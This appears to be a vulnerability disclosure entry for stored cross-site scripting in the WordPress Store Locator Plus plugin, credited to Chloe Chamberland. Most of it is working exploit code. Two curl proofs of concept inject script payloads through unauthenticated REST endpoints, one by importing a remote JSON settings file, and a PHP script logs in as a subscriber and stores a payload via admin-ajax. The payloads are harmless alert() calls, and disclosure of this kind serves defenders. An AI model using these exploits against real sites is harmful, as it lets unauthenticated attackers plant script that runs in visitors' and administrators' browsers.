There are several endpoints in the plugin that could allow unauthenticated attackers to inject malicious JavaScript into pages.
PoC #1

curl -i -s -k -X $'POST' --data-binary $'value=<script>alert(0)</script>' $'http://[SITE_URL]/wp-json/store-locator-plus/v2/options/label_radius/[MD5-OF-SITE-URL-HERE]/'

PoC #2

curl -i -s -k -X $'POST' \
  --data $'file-meta={\"url\":\"https://URL/slp_settings.json\"}' $'http://[YOURTARGETURL]/wp-json/store-locator-plus/v2/options/import/'

Where slp_settings.json is:

{"store-locator-le":{"settings":{"options":{"label_radius":"<script>alert(\"howdy\")</script>"}}}}

PoC #3 *Requires Authentication

<?php
// PoC #3: writes a JavaScript payload into the plugin's label_radius option
// through the admin-ajax 'slp_change_option' action. Unlike PoC #1/#2, which
// hit REST routes without any session, this one needs a logged-in account;
// the advisory states a subscriber is enough. That points to the handler
// lacking a capability check (e.g. current_user_can('manage_options')) and/or
// a nonce check (check_ajax_referer), in addition to the missing output
// escaping of the stored label — confirm against the plugin source.

// Settings
$wp_url = $argv[1];   // site base URL; the paths below are appended with a leading '/'
$wp_user = $argv[2];  // login name of the test account
$wp_pass = $argv[3];  // its password, taken from argv (visible in the process list)

// Log in as subscriber
$ch = curl_init();
// Temp file used as the cookie jar so the WordPress auth cookies from the
// login carry over to the second request.
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log' => $wp_user,
    'pwd' => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit' => 'Log+In',
]);
// NOTE(review): the login response is captured but never inspected, so a
// failed login is not detected before the second request is sent.
$output = curl_exec($ch);
curl_close($ch);

//XSS
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'action' => 'slp_change_option',
    'formdata[option_name]' => 'options_nojs[label_radius]',
    'formdata[option_value]' => '<script>alert(1)</script>'
]);
$content = curl_exec($ch);
echo $content;
// NOTE(review): the cookie jar file is never removed, so a live session cookie
// for the test account is left on disk after the script exits; the second curl
// handle is also never closed.
?>
Chloe Chamberland
Chloe Chamberland
Yes
2021-04-26 (about 1 year ago)
2021-04-27 (about 1 year ago)
2022-09-06 (about 6 months ago)